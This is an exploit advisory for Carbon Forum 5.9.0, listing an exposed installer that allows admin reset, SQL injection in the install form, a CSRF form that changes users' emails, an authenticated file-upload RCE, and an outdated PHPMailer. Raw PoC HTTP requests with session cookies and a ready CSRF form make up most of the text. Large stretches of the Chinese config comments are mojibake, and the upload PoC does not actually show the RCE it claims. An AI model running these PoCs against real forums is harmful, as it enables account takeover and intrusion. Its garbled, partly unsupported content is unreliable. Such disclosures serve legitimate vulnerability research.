{-} Title => Carbon Forum 5.9.0 - Multiple Exploits {-} Author => bRpsd [cy@Live.no] {-} Date Release => 22 June, 2024 {-} Vendor => Carbon Forum <= 5.9.0 Homepage => https://www.94cb.com/ Download => https://github.com/lincanbin/Carbon-Forum Vulnerable Versions => 5.9.0 >= Tested Version => 5.9.0 on xampp Server. ####################################################################################### Vulnerability #1 : Reset Administrator Password & Database settings File Path: http://localhost/Carbon-Forum/install/ INFO: The install folder remains after installation which allows attackers to recreate a new DB and have an admin account by default through registering the first user ####################################################################################### ####################################################################################### Vulnerability #2 : SQL Injection Vulnerable Code: /Carbon-Forum/install/index.php if ($_SERVER['REQUEST_METHOD'] == 'POST') { $fp = fopen(__DIR__ . '/database.sql', "r") or die("SQLæ–‡ä»¶æ— æ³•æ‰“å¼€ã€‚ The SQL File could not be opened."); //dobefore if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) { $Language = $_POST['Language']; $DBHost = $_POST['DBHost']; $DBName = $_POST['DBName']; $DBUser = $_POST['DBUser']; $DBPassword = $_POST['DBPassword']; $SearchServer = $_POST['SearchServer']; $SearchPort = $_POST['SearchPort']; $EnableMemcache = $_POST['EnableMemcache']; $MemCachePrefix = $_POST['MemCachePrefix']; } else { die("An Unexpected Error Occured!"); } //$WebsitePath = $_POST['WebsitePath']; $WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) { $WebsitePath = $WebsitePathMatch[1]; } else { $WebsitePath = ''; } //åˆå§‹åŒ–æ•°æ®åº“æ“作类 require('../library/PDO.class.php'); $DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword); $DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName)); if (empty($DatabaseExist)) { $DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";"); } POC Request: POST http://localhost/Carbon-Forum/install/? Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Content-Type: application/x-www-form-urlencoded Content-Length: 173 Origin: http://localhost Connection: keep-alive Referer: http://localhost/Carbon-Forum/install/ Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / Install Response: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1 You can find the error back in the log. ####################################################################################### ################################################################################################################ Vulnerability #3 : CSRF - Change users email File Path: http://localhost/Carbon-Forum/settings Method: POST Parameter : UserMail Code:Carbon-Forum/controller/settings.php POC: case 'UpdateUserInfo': $CurUserInfo['UserSex'] = intval(Request('POST', 'UserSex', 0)); $CurUserInfo['UserMail'] = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail']; $CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage'])); $CurUserInfo['UserIntro'] = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro'])); $UpdateUserInfoResult = UpdateUserInfo(array( 'UserSex' => $CurUserInfo['UserSex'], 'UserMail' => $CurUserInfo['UserMail'], 'UserHomepage' => $CurUserInfo['UserHomepage'], 'UserIntro' => $CurUserInfo['UserIntro'] )); if ($UpdateUserInfoResult) { $UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully']; <form method='POST' action='http://localhost/Carbon-Forum/settings'> <input type="hidden" name="Action" value="UpdateUserInfo"> <input type="hidden" name="UserSex" value="0"> <input type="hidden" name="UserMail" value="changed@new-email.com"> <input type="hidden" name="UserHomepage" value=""> <input type="hidden" name="UserIntro" value=""> <input type='submit' value='submit'> </form> ################################################################################################################ ####################################################################################### Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated] Info: Administrator can change allowed files in dashboard -> parameter POC POST: http://localhost/Carbon-Forum/dashboard#dashboard4 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Content-Type: application/x-www-form-urlencoded Content-Length: 14662 Origin: http://localhost Connection: keep-alive Referer: http://localhost/Carbon-Forum/dashboard Cookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktop Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Action=Parameter&UploadParameters=/* å‰åŽç«¯é€šä¿¡ç›¸å…³çš„é…ç½®,注释åªå…è®¸ä½¿ç”¨å¤šè¡Œæ–¹å¼ */ { /* ä¸Šä¼ å›¾ç‰‡é…置项 */ "imageActionName": "uploadimage", /* æ‰§è¡Œä¸Šä¼ å›¾ç‰‡çš„actionåç§° */ "imageFieldName": "upfile", /* æäº¤çš„图片表å•åç§° */ "imageMaxSize": 4096000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* ä¸Šä¼ å›¾ç‰‡æ ¼å¼æ˜¾ç¤º */ "imageCompressEnable": true, /* 是å¦åŽ‹ç¼©å›¾ç‰‡,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边é™åˆ¶ */ "imageInsertAlign": "none", /* æ’å…¥çš„å›¾ç‰‡æµ®åŠ¨æ–¹å¼ */ "imageUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ /* {filename} ä¼šæ›¿æ¢æˆåŽŸæ–‡ä»¶å,é…ç½®è¿™é¡¹éœ€è¦æ³¨æ„䏿–‡ä¹±ç 问题 */ /* {rand:6} ä¼šæ›¿æ¢æˆéšæœºæ•°,åŽé¢çš„æ•°å—æ˜¯éšæœºæ•°çš„使•° */ /* {time} ä¼šæ›¿æ¢æˆæ—¶é—´æˆ³ */ /* {yyyy} ä¼šæ›¿æ¢æˆå››ä½å¹´ä»½ */ /* {yy} ä¼šæ›¿æ¢æˆä¸¤ä½å¹´ä»½ */ /* {mm} ä¼šæ›¿æ¢æˆä¸¤ä½æœˆä»½ */ /* {dd} ä¼šæ›¿æ¢æˆä¸¤ä½æ—¥æœŸ */ /* {hh} ä¼šæ›¿æ¢æˆä¸¤ä½å°æ—¶ */ /* {ii} ä¼šæ›¿æ¢æˆä¸¤ä½åˆ†é’Ÿ */ /* {ss} ä¼šæ›¿æ¢æˆä¸¤ä½ç§’ */ /* éžæ³•å—符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* æ¶‚é¸¦å›¾ç‰‡ä¸Šä¼ é…置项 */ "scrawlActionName": "uploadscrawl", /* æ‰§è¡Œä¸Šä¼ æ¶‚é¸¦çš„actionåç§° */ "scrawlFieldName": "upfile", /* æäº¤çš„图片表å•åç§° */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "scrawlMaxSize": 2048000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B */ "scrawlUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* æˆªå›¾å·¥å…·ä¸Šä¼ */ "snapscreenActionName": "uploadimage", /* æ‰§è¡Œä¸Šä¼ æˆªå›¾çš„actionåç§° */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "snapscreenUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "snapscreenInsertAlign": "none", /* æ’å…¥çš„å›¾ç‰‡æµ®åŠ¨æ–¹å¼ */ /* 抓å–远程图片é…ç½® */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓å–远程图片的actionåç§° */ "catcherFieldName": "source", /* æäº¤çš„图片列表表å•åç§° */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "catcherUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "catcherMaxSize": 2048000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓å–å›¾ç‰‡æ ¼å¼æ˜¾ç¤º */ /* ä¸Šä¼ è§†é¢‘é…ç½® */ "videoActionName": "uploadvideo", /* æ‰§è¡Œä¸Šä¼ è§†é¢‘çš„actionåç§° */ "videoFieldName": "upfile", /* æäº¤çš„视频表å•åç§° */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "videoUrlPrefix": "", /* 视频访问路径å‰ç¼€ */ "videoMaxSize": 20480000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B,默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* ä¸Šä¼ è§†é¢‘æ ¼å¼æ˜¾ç¤º */ /* ä¸Šä¼ æ–‡ä»¶é…ç½® */ "fileActionName": "uploadfile", /* controller里,æ‰§è¡Œä¸Šä¼ è§†é¢‘çš„actionåç§° */ "fileFieldName": "upfile", /* æäº¤çš„æ–‡ä»¶è¡¨å•åç§° */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* ä¸Šä¼ ä¿å˜è·¯å¾„,å¯ä»¥è‡ªå®šä¹‰ä¿å˜è·¯å¾„å’Œæ–‡ä»¶åæ ¼å¼ */ "fileUrlPrefix": "", /* 文件访问路径å‰ç¼€ */ "fileMaxSize": 2048000, /* ä¸Šä¼ å¤§å°é™åˆ¶ï¼Œå•ä½B,默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* ä¸Šä¼ æ–‡ä»¶æ ¼å¼æ˜¾ç¤º */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管ç†çš„actionåç§° */ "imageManagerListPath": "/upload/image/", /* 指定è¦åˆ—出图片的目录 */ "imageManagerListSize": 60, /* æ¯æ¬¡åˆ—å‡ºæ–‡ä»¶æ•°é‡ */ "imageManagerUrlPrefix": "", /* 图片访问路径å‰ç¼€ */ "imageManagerInsertAlign": "none", /* æ’å…¥çš„å›¾ç‰‡æµ®åŠ¨æ–¹å¼ */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管ç†çš„actionåç§° */ "fileManagerListPath": "/upload/file/", /* 指定è¦åˆ—出文件的目录 */ "fileManagerUrlPrefix": "", /* 文件访问路径å‰ç¼€ */ "fileManagerListSize": 60, /* æ¯æ¬¡åˆ—å‡ºæ–‡ä»¶æ•°é‡ */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键è¯è¿‡æ»¤ç›¸å…³çš„é…ç½®,注释åªå…è®¸ä½¿ç”¨å¤šè¡Œæ–¹å¼ */ { /* 关键è¯å‡æ”¯æŒæ£åˆ™è¡¨è¾¾å¼ï¼Œè¿‡å¤šçš„è¿‡æ»¤ä¼šå½±å“æ€§èƒ½ "fuck" : "f**k", 以上规则表示å‘表å«fuck的内容,会被过滤为f**k "negro" : [false, 30], Don't issue text with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], ä»¥ä¸Šè§„åˆ™ç¦æ¢å‘布å«â€œè›¤â€çš„内容,并且å°è¯•å‘表该内容的用户会被ç»(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包å" : ["ç»´å°¼", 30], 以上规则表示å‘表å«"包å"的内容,会被过滤为"ç»´å°¼",并且在内容å‘表æˆåŠŸåŽï¼Œéœ€è¦å†ç‰30ç§’æ‰èƒ½å‘言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包å" : ["ç»´å°¼", 30] */ }&submit=Save settings ####################################################################################### ####################################################################################### Vulnerability #4 : Vulnerable PHPMailer library File: /Carbon-Forum/library/PHPMailer.class.php Version: $Version = '5.2.16'; #######################################################################################